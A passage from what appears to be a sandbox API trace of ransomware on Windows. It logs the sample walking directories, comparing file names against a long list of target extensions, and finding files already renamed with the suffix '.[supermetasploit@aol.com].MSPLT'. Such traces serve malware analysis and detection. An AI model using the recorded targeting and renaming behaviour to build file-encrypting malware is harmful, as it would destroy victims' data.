lstrlenW (lpString=".fido") returned 5 [0283.311] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0283.311] lstrlenW (lpString=".flm") returned 4 [0283.311] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0283.311] lstrlenW (lpString=".flv") returned 4 [0283.311] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0283.311] lstrlenW (lpString=".frm") returned 4 [0283.311] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0283.311] lstrlenW (lpString=".fxg") returned 4 [0283.311] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0283.311] lstrlenW (lpString=".geo") returned 4 [0283.312] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0283.312] lstrlenW (lpString=".gif") returned 4 [0283.312] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0283.312] lstrlenW (lpString=".grs") returned 4 [0283.312] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0283.312] lstrlenW (lpString=".gz") returned 3 [0283.312] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0283.312] lstrlenW (lpString=".h") returned 2 [0283.312] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0283.312] lstrlenW (lpString=".hdr") returned 4 [0283.312] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0283.312] lstrlenW (lpString=".hpp") returned 4 [0283.312] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0283.312] lstrlenW (lpString=".hta") returned 4 [0283.312] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0283.312] lstrlenW (lpString=".htc") returned 4 [0283.312] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0283.312] lstrlenW (lpString=".htm") returned 4 [0283.312] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0283.312] lstrlenW (lpString=".html") returned 5 [0283.312] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0283.312] lstrlenW (lpString=".icb") returned 4 [0283.312] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0283.312] lstrlenW (lpString=".ics") returned 4 [0283.312] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0283.312] lstrlenW (lpString=".iff") returned 4 [0283.312] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0283.312] lstrlenW (lpString=".inc") returned 4 [0283.312] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0283.312] lstrlenW (lpString=".indd") returned 5 [0283.312] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0283.312] lstrlenW (lpString=".ini") returned 4 [0283.313] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0283.313] lstrlenW (lpString=".iqy") returned 4 [0283.313] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0283.313] lstrlenW (lpString=".j2c") returned 4 [0283.313] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0283.313] lstrlenW (lpString=".j2k") returned 4 [0283.313] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0283.313] lstrlenW (lpString=".java") returned 5 [0283.313] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0283.313] lstrlenW (lpString=".jp2") returned 4 [0283.313] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0283.313] lstrlenW (lpString=".jpc") returned 4 [0283.313] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0283.313] lstrlenW (lpString=".jpe") returned 4 [0283.313] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0283.313] lstrlenW (lpString=".jpeg") returned 5 [0283.313] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0283.313] lstrlenW (lpString=".jpf") returned 4 [0283.313] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0283.313] lstrlenW (lpString=".jpg") returned 4 [0283.313] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0283.313] lstrlenW (lpString=".jpx") returned 4 [0283.313] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0283.313] lstrlenW (lpString=".js") returned 3 [0283.313] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0283.313] lstrlenW (lpString=".jsf") returned 4 [0283.313] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0283.313] lstrlenW (lpString=".json") returned 5 [0283.313] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0283.314] lstrlenW (lpString=".jsp") returned 4 [0283.314] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".kdc") returned 4 [0283.314] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".kmz") returned 4 [0283.314] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".kwm") returned 4 [0283.314] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".lasso") returned 6 [0283.314] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0283.314] lstrlenW (lpString=".lbi") returned 4 [0283.314] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".lgf") returned 4 [0283.314] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".lgp") returned 4 [0283.314] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".log") returned 4 [0283.314] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".m1v") returned 4 [0283.314] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".m4a") returned 4 [0283.314] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".m4v") returned 4 [0283.314] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".max") returned 4 [0283.314] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".md") returned 3 [0283.314] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0283.314] lstrlenW (lpString=".mda") returned 4 [0283.314] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".mdb") returned 4 [0283.314] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0283.314] lstrlenW (lpString=".mde") returned 4 [0283.315] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mdf") returned 4 [0283.315] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mdw") returned 4 [0283.315] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mef") returned 4 [0283.315] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mft") returned 4 [0283.315] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mfw") returned 4 [0283.315] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mht") returned 4 [0283.315] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mhtml") returned 6 [0283.315] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0283.315] lstrlenW (lpString=".mka") returned 4 [0283.315] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mkidx") returned 6 [0283.315] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0283.315] lstrlenW (lpString=".mkv") returned 4 [0283.315] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mos") returned 4 [0283.315] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mov") returned 4 [0283.315] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mp3") returned 4 [0283.315] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mp4") returned 4 [0283.315] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0283.315] lstrlenW (lpString=".mpeg") returned 5 [0283.315] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0283.315] lstrlenW (lpString=".mpg") returned 4 [0283.316] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".mpv") returned 4 [0283.316] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".mrw") returned 4 [0283.316] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".msg") returned 4 [0283.316] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".mxl") returned 4 [0283.316] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".myd") returned 4 [0283.316] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".myi") returned 4 [0283.316] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".nef") returned 4 [0283.316] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".nrw") returned 4 [0283.316] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".obj") returned 4 [0283.316] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".odb") returned 4 [0283.316] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".odc") returned 4 [0283.316] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".odm") returned 4 [0283.316] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".odp") returned 4 [0283.316] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0283.316] lstrlenW (lpString=".ods") returned 4 [0283.317] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".oft") returned 4 [0283.317] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".one") returned 4 [0283.317] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".onepkg") returned 7 [0283.317] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0283.317] lstrlenW (lpString=".onetoc2") returned 8 [0283.317] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0283.317] lstrlenW (lpString=".opt") returned 4 [0283.317] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".oqy") returned 4 [0283.317] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".orf") returned 4 [0283.317] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".p12") returned 4 [0283.317] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".p7b") returned 4 [0283.317] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".p7c") returned 4 [0283.317] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".pam") returned 4 [0283.317] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".pbm") returned 4 [0283.317] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".pct") returned 4 [0283.317] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".pcx") returned 4 [0283.317] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0283.317] lstrlenW (lpString=".pdd") returned 4 [0283.317] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0283.318] lstrlenW (lpString=".pdf") returned 4 [0283.318] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0283.318] lstrlenW (lpString=".pdp") returned 4 [0283.318] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0283.318] lstrlenW (lpString=".pef") returned 4 [0283.318] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0283.318] lstrlenW (lpString=".pem") returned 4 [0283.318] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0283.318] lstrlenW (lpString=".pff") returned 4 [0283.318] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0283.318] lstrlenW (lpString=".pfm") returned 4 [0283.318] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0283.318] lstrlenW (lpString=".pfx") returned 4 [0283.318] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0283.318] lstrlenW (lpString=".pgm") returned 4 [0283.318] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0283.318] lstrlenW (lpString=".php") returned 4 [0283.318] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0283.318] lstrlenW (lpString=".php3") returned 5 [0283.318] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0283.318] lstrlenW (lpString=".php4") returned 5 [0283.318] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0283.318] lstrlenW (lpString=".php5") returned 5 [0283.318] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0283.318] lstrlenW (lpString=".phtml") returned 6 [0283.318] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0283.318] lstrlenW (lpString=".pict") returned 5 [0283.318] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0283.318] lstrlenW (lpString=".pl") returned 3 [0283.319] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0283.319] lstrlenW (lpString=".pls") returned 4 [0283.510] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0283.510] lstrlenW (lpString=".pm") returned 3 [0283.510] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0283.510] lstrlenW (lpString=".png") returned 4 [0283.510] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0283.510] lstrlenW (lpString=".pnm") returned 4 [0283.510] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0283.510] lstrlenW (lpString=".pot") returned 4 [0283.510] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0283.510] lstrlenW (lpString=".potm") returned 5 [0283.510] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0283.511] lstrlenW (lpString=".potx") returned 5 [0283.511] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0283.511] lstrlenW (lpString=".ppa") returned 4 [0283.511] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0283.511] lstrlenW (lpString=".ppam") returned 5 [0283.511] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0283.511] lstrlenW (lpString=".ppm") returned 4 [0283.511] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0283.511] lstrlenW (lpString=".pps") returned 4 [0283.511] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0283.511] lstrlenW (lpString=".ppsm") returned 5 [0283.511] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0283.511] lstrlenW (lpString=".ppt") returned 4 [0283.511] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0283.511] lstrlenW (lpString=".pptm") returned 5 [0283.511] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0283.511] lstrlenW (lpString=".pptx") returned 5 [0283.511] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0283.511] lstrlenW (lpString=".prn") returned 4 [0283.511] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0283.511] lstrlenW (lpString=".ps") returned 3 [0283.511] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0283.511] lstrlenW (lpString=".psb") returned 4 [0283.511] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0283.511] lstrlenW (lpString=".psd") returned 4 [0283.511] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0283.511] lstrlenW (lpString=".pst") returned 4 [0283.511] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0283.511] lstrlenW (lpString=".ptx") returned 4 [0283.511] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0283.511] lstrlenW (lpString=".pub") returned 4 [0283.511] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0283.511] lstrlenW (lpString=".pwm") returned 4 [0283.511] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0283.511] lstrlenW (lpString=".pxr") returned 4 [0283.512] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0283.512] lstrlenW (lpString=".py") returned 3 [0283.512] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0283.512] lstrlenW (lpString=".qt") returned 3 [0283.512] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0283.512] lstrlenW (lpString=".r3d") returned 4 [0283.512] lstrcmpiW (lpString1=".r3d", lpString2="SPLT") returned -1 [0283.512] lstrlenW (lpString=".raf") returned 4 [0283.512] lstrcmpiW (lpString1=".raf", lpString2="SPLT") returned -1 [0283.512] lstrlenW (lpString=".rar") returned 4 [0283.512] lstrcmpiW (lpString1=".rar", lpString2="SPLT") returned -1 [0283.512] lstrlenW (lpString=".raw") returned 4 [0283.512] lstrcmpiW (lpString1=".raw", lpString2="SPLT") returned -1 [0283.512] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x593a4fb8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x593a4fb8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x593cb2af, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0xffffddcd, dwReserved1=0xbc, cFileName="desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DESKTO~1.MSP")) returned 0 [0283.512] FindClose (in: hFindFile=0x48a270 | out: hFindFile=0x48a270) returned 1 [0283.512] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3880058 | out: hHeap=0x470000) returned 1 [0283.512] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf55a58a9, ftLastAccessTime.dwHighDateTime=0x1d60985, ftLastWriteTime.dwLowDateTime=0xf55a58a9, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0283.512] FindClose (in: hFindFile=0x48a8b0 | out: hFindFile=0x48a8b0) returned 1 [0283.512] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.605] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0283.644] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x6392cc9b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x6392cc9b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0283.644] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4000730 [0283.644] lstrlenW (lpString="C:\\588bce7c90097ed212") returned 21 [0283.645] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x6392cc9b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x6392cc9b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x48a8b0 [0283.645] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x6392cc9b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x6392cc9b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0283.645] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59b8ac04, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59b8ac04, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1025", cAlternateFileName="")) returned 1 [0283.645] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025") returned 26 [0283.645] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\588bce7c90097ed212\\1025") returned 1 [0283.645] lstrlenW (lpString="1025") returned 4 [0283.645] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="1025") returned 1 [0283.645] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014e00 [0283.650] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025") returned 26 [0283.650] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59b8ac04, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59b8ac04, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48a1b0 [0283.651] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59b8ac04, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59b8ac04, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.651] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x594d6329, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x594d6329, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59b45016, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.651] lstrlenW (lpString="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 52 [0283.651] lstrlenW (lpString=".1cd") returned 4 [0283.651] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0283.651] lstrlenW (lpString=".3ds") returned 4 [0283.651] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0283.651] lstrlenW (lpString=".3fr") returned 4 [0283.651] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0283.651] lstrlenW (lpString=".3g2") returned 4 [0283.651] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0283.651] lstrlenW (lpString=".3gp") returned 4 [0283.651] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0283.651] lstrlenW (lpString=".7z") returned 3 [0283.652] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0283.652] lstrlenW (lpString=".accda") returned 6 [0283.652] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0283.652] lstrlenW (lpString=".accdb") returned 6 [0283.652] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0283.652] lstrlenW (lpString=".accdc") returned 6 [0283.652] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0283.652] lstrlenW (lpString=".accde") returned 6 [0283.652] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0283.652] lstrlenW (lpString=".accdt") returned 6 [0283.652] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0283.652] lstrlenW (lpString=".accdw") returned 6 [0283.652] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0283.652] lstrlenW (lpString=".adb") returned 4 [0283.652] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0283.652] lstrlenW (lpString=".adp") returned 4 [0283.652] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0283.652] lstrlenW (lpString=".ai") returned 3 [0283.652] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0283.652] lstrlenW (lpString=".ai3") returned 4 [0283.652] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0283.652] lstrlenW (lpString=".ai4") returned 4 [0283.652] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0283.652] lstrlenW (lpString=".ai5") returned 4 [0283.652] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0283.652] lstrlenW (lpString=".ai6") returned 4 [0283.652] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0283.653] lstrlenW (lpString=".ai7") returned 4 [0283.653] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0283.653] lstrlenW (lpString=".ai8") returned 4 [0283.653] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0283.653] lstrlenW (lpString=".anim") returned 5 [0283.653] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0283.653] lstrlenW (lpString=".arw") returned 4 [0283.653] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0283.653] lstrlenW (lpString=".as") returned 3 [0283.653] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0283.653] 